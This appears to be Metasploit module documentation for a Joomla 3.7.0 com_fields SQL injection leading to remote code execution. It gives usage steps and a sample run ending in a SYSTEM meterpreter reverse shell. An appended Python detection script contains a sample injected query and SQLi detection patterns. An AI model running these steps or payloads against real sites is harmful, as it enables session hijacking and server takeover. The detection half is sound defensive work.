## Vulnerable Application

This module exploits a SQL injection vulnerability in the com_fields component, which was introduced into the Joomla core in version 3.7.0 (CVE-2017-8917, fixed in 3.7.1).

The injection is used to read the session cookies (session IDs) of logged-in Administrator and Super User accounts out of the database and hijack one of those sessions. The RCE stage depends on a Super User session being active at the time: if none is, the module can still enumerate sessions but will not get code execution. Once a session is hijacked, the module identifies one of the installed site templates, writes the payload into that template as a new PHP file through the template editor, requests the file so that it executes, and then deletes it.
## Verification Steps

- Start msfconsole
- Do: `use exploit/unix/webapp/joomla_comfields_sqli_rce`
- Do: `set rhost [ip]`
- Do: `set targeturi [uri]` (the Joomla base path, e.g. `/joomlatest/` in the scenario below)
- Do: `exploit`
- Get a shell
## Scenarios

### Joomla 3.7.0 on Windows 7 SP1 with Super User authenticated
```
msf5 exploit(unix/webapp/joomla_comfields_sqli_rce) > run

[*] Started reverse TCP handler on 172.22.222.138:4444
[*] 172.22.222.122:80 - Retrieved table prefix [ unqi0 ]
[*] 172.22.222.122:80 - Retrieved cookie [ ejn9i2c5srk6gchhai4cikdkm3 ]
[*] 172.22.222.122:80 - Retrieved unauthenticated cookie [ 33effe3d96e4c5e749f33b9d639ca36b ]
[+] 172.22.222.122:80 - Successfully authenticated
[*] 172.22.222.122:80 - Creating file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Following redirect to [ /joomlatest/administrator/index.php?option=com_templates&view=template&id=503&file=L3pNOFp2SUFBd3hFLnBocA%3D%3D ]
[*] 172.22.222.122:80 - Token [ df2760a9614efc2566917148ee379c42 ] retrieved
[*] 172.22.222.122:80 - Template path [ /templates/beez3/ ] retrieved
[*] 172.22.222.122:80 - Insert payload into file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Payload data inserted into [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Executing payload
[*] Sending stage (37543 bytes) to 172.22.222.122
[+] Deleted zM8ZvIAAwxE.php

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    : WIN-V438RLMESAE
OS          : Windows NT WIN-V438RLMESAE 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64
Meterpreter : php/windows
meterpreter >
```
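As an added detection example (not part of this module or its documentation), the following Python script checks the two stages of the chain above that are visible in a web server access log: a com_fields request carrying SQL function tokens in its query string (the injection), and a com_templates request whose base64-encoded `file` parameter decodes to a `.php` path, followed by a direct request to that file under `/templates/` (the new template file and its execution). The session-hijack stage only presents the stolen cookie in a request header and leaves nothing in a default Combined Log Format log, so it is not checked. The log lines, their timestamps and client addresses, and the injected parameter name in the first line are constructed assumptions; the com_templates redirect and the template file name are taken from the module output above.

```python
"""Access-log detection for the com_fields SQLi -> template-file RCE chain.

Indicators checked (both visible in Combined Log Format):
  1. a com_fields request whose query string contains SQL function tokens;
  2. a com_templates request whose base64 `file` parameter decodes to a .php
     path, followed by a direct GET of that file name under /templates/.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample log (assumption, not a real capture). Line 3 mirrors the
# redirect shown in the module output; line 4 is the payload file being
# requested from the template path the module reported. The injected
# parameter name in line 1 is illustrative; the check below does not rely on it.
SAMPLE_LOG = """\
172.22.222.138 - - [10/May/2017:12:00:01 +0000] "GET /joomlatest/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(0x23%2Cconcat(1%2Cuser())%2C1) HTTP/1.1" 500 1531 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2017:12:00:02 +0000] "GET /joomlatest/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
172.22.222.138 - - [10/May/2017:12:00:05 +0000] "GET /joomlatest/administrator/index.php?option=com_templates&view=template&id=503&file=L3pNOFp2SUFBd3hFLnBocA%3D%3D HTTP/1.1" 200 22010 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2017:12:00:06 +0000] "GET /joomlatest/templates/beez3/css/template.css HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
172.22.222.138 - - [10/May/2017:12:00:07 +0000] "GET /joomlatest/templates/beez3/zM8ZvIAAwxE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Error-based / time-based MySQL primitives commonly used to pull data through
# an injection, plus a plain UNION SELECT.
SQLI_RE = re.compile(
    r'(?i)\b(?:updatexml|extractvalue|sleep|benchmark|concat)\s*\('
    r'|\bunion\s+(?:all\s+)?select\b'
)
# A PHP file requested directly from a template directory.
TEMPLATE_PHP_RE = re.compile(r'/templates/[^/]+/([^/]+\.php)$', re.IGNORECASE)


def parse_line(line):
    """Return a dict with src, ts, path, decoded query and params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    rec['query'] = unquote_plus(parts.query)
    rec['params'] = {k: v[0] for k, v in
                     parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def decode_template_file_param(value):
    """com_templates carries the edited file path base64-encoded in `file`
    (see the redirect in the module output). Return the path or None."""
    try:
        return base64.b64decode(value, validate=True).decode('ascii')
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def analyze(lines):
    """Return a list of (indicator, src, ts, detail) tuples in log order."""
    findings = []
    staged = set()  # base names of .php files touched through com_templates
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        option = rec['params'].get('option', '')
        if option == 'com_fields' and SQLI_RE.search(rec['query']):
            findings.append(('sqli_com_fields', rec['src'], rec['ts'], rec['query']))
        if option == 'com_templates' and 'file' in rec['params']:
            decoded = decode_template_file_param(rec['params']['file'])
            if decoded and decoded.lower().endswith('.php'):
                staged.add(decoded.rsplit('/', 1)[-1])
                findings.append(('template_php_edit', rec['src'], rec['ts'], decoded))
        m = TEMPLATE_PHP_RE.search(rec['path'])
        if m and m.group(1) in staged:
            findings.append(('template_php_executed', rec['src'], rec['ts'], rec['path']))
    return findings


if __name__ == '__main__':
    for indicator, src, ts, detail in analyze(SAMPLE_LOG.splitlines()):
        print(f'{ts} {src} {indicator}: {detail}')
```

The correlation on file name is deliberate: a legitimate administrator editing `index.php` through com_templates also produces a `template_php_edit` finding, but only a freshly created file that is then fetched directly from the template directory yields `template_php_executed`, which is the hit worth paging on.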